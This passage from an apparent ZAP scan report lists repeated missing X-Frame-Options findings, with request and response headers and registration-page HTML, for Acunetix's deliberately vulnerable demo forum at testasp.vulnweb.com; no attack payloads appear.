style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div 